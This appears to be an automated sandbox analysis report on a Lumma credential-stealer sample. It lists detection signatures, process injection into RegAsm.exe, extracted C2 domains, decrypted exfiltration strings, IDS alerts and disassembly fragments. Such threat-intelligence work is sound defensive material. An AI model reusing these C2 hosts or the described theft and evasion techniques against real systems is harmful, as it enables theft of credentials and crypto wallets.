Edit tour

Windows Analysis Report
5_6253708004881862888.exe

Overview

General Information

Sample name:	5_6253708004881862888.exe
Analysis ID:	1577316
MD5:	62dad59c8a4bf1e860671c00d12d6bae
SHA1:	80e845f3b3a3e94c9211ff88b02f21a70876544c
SHA256:	7722b15ba8511393f25c183b793ceb9c9b14d5a211e1161b40fde26d8be9bcba
Tags:	18521511316185215113209bulletproofexeuser-abus3reports
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

.NET source code contains very large array initializations

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

5_6253708004881862888.exe (PID: 2352 cmdline: "C:\Users\user\Desktop\5_6253708004881862888.exe" MD5: 62DAD59C8A4BF1E860671C00D12D6BAE)

conhost.exe (PID: 5940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1412 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 7664 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 1852 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["traineiwnqo.shop", "stagedchheiqwo.shop", "locatedblsoqp.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "muggudrowiwm.shop", "stamppreewntnq.shop", "condedqpwqm.shop"], "Build id": "LPnhqo--bvnqgemxfyyo"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1412	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 1412	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
8.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:14.045543+0100	2028371	3	Unknown Traffic	192.168.2.7	49700	104.131.68.180	443	TCP
2024-12-18T11:40:17.462906+0100	2028371	3	Unknown Traffic	192.168.2.7	49701	23.55.153.106	443	TCP
2024-12-18T11:40:19.820798+0100	2028371	3	Unknown Traffic	192.168.2.7	49702	104.21.66.86	443	TCP
2024-12-18T11:40:22.264240+0100	2028371	3	Unknown Traffic	192.168.2.7	49704	104.21.66.86	443	TCP
2024-12-18T11:40:24.422105+0100	2028371	3	Unknown Traffic	192.168.2.7	49710	104.21.66.86	443	TCP
2024-12-18T11:40:26.856672+0100	2028371	3	Unknown Traffic	192.168.2.7	49716	104.21.66.86	443	TCP
2024-12-18T11:40:28.953720+0100	2028371	3	Unknown Traffic	192.168.2.7	49723	104.21.66.86	443	TCP
2024-12-18T11:40:31.345970+0100	2028371	3	Unknown Traffic	192.168.2.7	49730	104.21.66.86	443	TCP
2024-12-18T11:40:34.137977+0100	2028371	3	Unknown Traffic	192.168.2.7	49742	104.21.66.86	443	TCP
2024-12-18T11:40:37.998967+0100	2028371	3	Unknown Traffic	192.168.2.7	49747	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:14.475338+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49700	104.131.68.180	443	TCP
2024-12-18T11:40:20.639675+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49702	104.21.66.86	443	TCP
2024-12-18T11:40:22.979787+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49704	104.21.66.86	443	TCP
2024-12-18T11:40:38.790701+0100	2054653	1	A Network Trojan was detected	192.168.2.7	49747	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:15.687016+0100	2055474	1	A Network Trojan was detected	192.168.2.7	59309	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (condedqpwqm .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:14.773766+0100	2055475	1	A Network Trojan was detected	192.168.2.7	56654	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:14.919416+0100	2055477	1	A Network Trojan was detected	192.168.2.7	61846	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:14.482513+0100	2055479	1	A Network Trojan was detected	192.168.2.7	49410	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:15.162418+0100	2055480	1	A Network Trojan was detected	192.168.2.7	58373	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:15.302899+0100	2055481	1	A Network Trojan was detected	192.168.2.7	59516	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:15.451451+0100	2055482	1	A Network Trojan was detected	192.168.2.7	57263	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:14.629840+0100	2055483	1	A Network Trojan was detected	192.168.2.7	53966	1.1.1.1	53	UDP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:14.475338+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49700	104.131.68.180	443	TCP
2024-12-18T11:40:20.639675+0100	2049836	1	A Network Trojan was detected	192.168.2.7	49702	104.21.66.86	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:22.979787+0100	2049812	1	A Network Trojan was detected	192.168.2.7	49704	104.21.66.86	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (muggudrowiwm .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:14.045543+0100	2058298	1	Domain Observed Used for C2 Detected	192.168.2.7	49700	104.131.68.180	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (muggudrowiwm .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:11.288419+0100	2058297	1	Domain Observed Used for C2 Detected	192.168.2.7	53162	1.1.1.1	53	UDP
2024-12-18T11:40:12.292864+0100	2058297	1	Domain Observed Used for C2 Detected	192.168.2.7	53162	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:27.670570+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.7	49716	104.21.66.86	443	TCP

ETPRO MALWARE Malicious SSL Certificate Detected (Linux.Rex Scanner)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:14.050441+0100	2822521	1	Domain Observed Used for C2 Detected	104.131.68.180	443	192.168.2.7	49700	TCP

ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-18T11:40:18.330473+0100	2858666	1	Domain Observed Used for C2 Detected	192.168.2.7	49701	23.55.153.106	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: 5_6253708004881862888.exe

Avira: detected

Antivirus detection for URL or domain

Source: millyscroqwp.shop	Avira URL Cloud: Label: malware
Source: https://muggudrowiwm.shop/api	Avira URL Cloud: Label: malware
Source: locatedblsoqp.shop	Avira URL Cloud: Label: malware
Source: evoliutwoqm.shop	Avira URL Cloud: Label: malware
Source: caffegclasiqwp.shop	Avira URL Cloud: Label: malware
Source: muggudrowiwm.shop	Avira URL Cloud: Label: malware
Source: traineiwnqo.shop	Avira URL Cloud: Label: malware

Found malware configuration

Source: 8.2.RegAsm.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["traineiwnqo.shop", "stagedchheiqwo.shop", "locatedblsoqp.shop", "caffegclasiqwp.shop", "evoliutwoqm.shop", "millyscroqwp.shop", "muggudrowiwm.shop", "stamppreewntnq.shop", "condedqpwqm.shop"], "Build id": "LPnhqo--bvnqgemxfyyo"}

Multi AV Scanner detection for submitted file

Source: 5_6253708004881862888.exe	Virustotal: Detection: 78%			Perma Link
Source: 5_6253708004881862888.exe	ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: caffegclasiqwp.shop
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stamppreewntnq.shop
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stagedchheiqwo.shop
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: millyscroqwp.shop
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: evoliutwoqm.shop
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: condedqpwqm.shop
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: traineiwnqo.shop
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: locatedblsoqp.shop
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: muggudrowiwm.shop
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: LPnhqo--bvnqgemxfyyo

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00413F33 CryptUnprotectData,

8_2_00413F33

Source: 5_6253708004881862888.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.131.68.180:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.7:49747 version: TLS 1.2

Source: 5_6253708004881862888.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	8_2_0041F860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+04h]	8_2_0040B9F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000CCh]	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000544h]	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+04h], ecx	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000CCh]	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+38h]	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	8_2_0041434A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push 00000000h	8_2_0041434A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], 84AA3BD1h	8_2_0043FBA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [eax], 00000000h	8_2_0040EC7D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [esp+0000010Ch]	8_2_0040AC10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0040A670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, ecx	8_2_00413F33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	8_2_00415F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_00415F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], cx	8_2_0041D042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	8_2_0041D042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, dword ptr [esp+44h]	8_2_0041D042
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp esi	8_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	8_2_00432810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000A4h]	8_2_0041182A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_0041182A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [esi], cx	8_2_0041D0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp+08h]	8_2_0041D0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [ebx]	8_2_00440160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	8_2_0041B100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, dword ptr [esp+00000090h]	8_2_00420911
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	8_2_00404130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	8_2_00414930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], dl	8_2_00414930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then push 00000000h	8_2_00414930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [ebx+01h], 00000000h	8_2_00413243
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esp]	8_2_00415A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	8_2_00422AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, eax	8_2_0041BAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	8_2_0041BAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [esi], 00000000h	8_2_00410AED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [eax], cx	8_2_0041B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 625B6034h	8_2_0041B360
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	8_2_00411E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edi], ax	8_2_00411E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	8_2_004233D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000CCh]	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edx, dword ptr [esi+00000544h]	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esi+04h], ecx	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [edi], cl	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000CCh]	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+38h]	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov byte ptr [ecx], al	8_2_00426AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp ecx	8_2_0043EC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+30h]	8_2_00408C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	8_2_00408C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then movzx eax, word ptr [esi+ecx]	8_2_00439CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [00446A64h]	8_2_0041EC8C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov esi, 00008000h	8_2_00404490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov dword ptr [esp], 00000000h	8_2_004134A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esi+000000CCh]	8_2_00427554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp byte ptr [edi+01h], 00000000h	8_2_00410511
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	8_2_00411D2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	8_2_00423DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then lea eax, dword ptr [esp+74h]	8_2_00422650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	8_2_00411E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edi], ax	8_2_00411E0E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	8_2_00421E0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then jmp eax	8_2_00421E0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ebp, dword ptr [esp+4Ch]	8_2_00421E0D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov edi, ecx	8_2_00411E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov word ptr [edi], ax	8_2_00411E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov ecx, dword ptr [esp]	8_2_0043EF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp+000000A4h]	8_2_004117E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then mov eax, dword ptr [esp]	8_2_004117E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 4x nop then cmp dword ptr [ebx+edi*8], EEEB5415h	8_2_0043B780

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055479 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) : 192.168.2.7:49410 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055483 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (traineiwnqo .shop) : 192.168.2.7:53966 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055482 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stamppreewntnq .shop) : 192.168.2.7:57263 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055477 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (evoliutwoqm .shop) : 192.168.2.7:61846 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055480 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (millyscroqwp .shop) : 192.168.2.7:58373 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055481 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (stagedchheiqwo .shop) : 192.168.2.7:59516 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058297 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (muggudrowiwm .shop) : 192.168.2.7:53162 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055474 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (caffegclasiqwp .shop) : 192.168.2.7:59309 -> 1.1.1.1:53
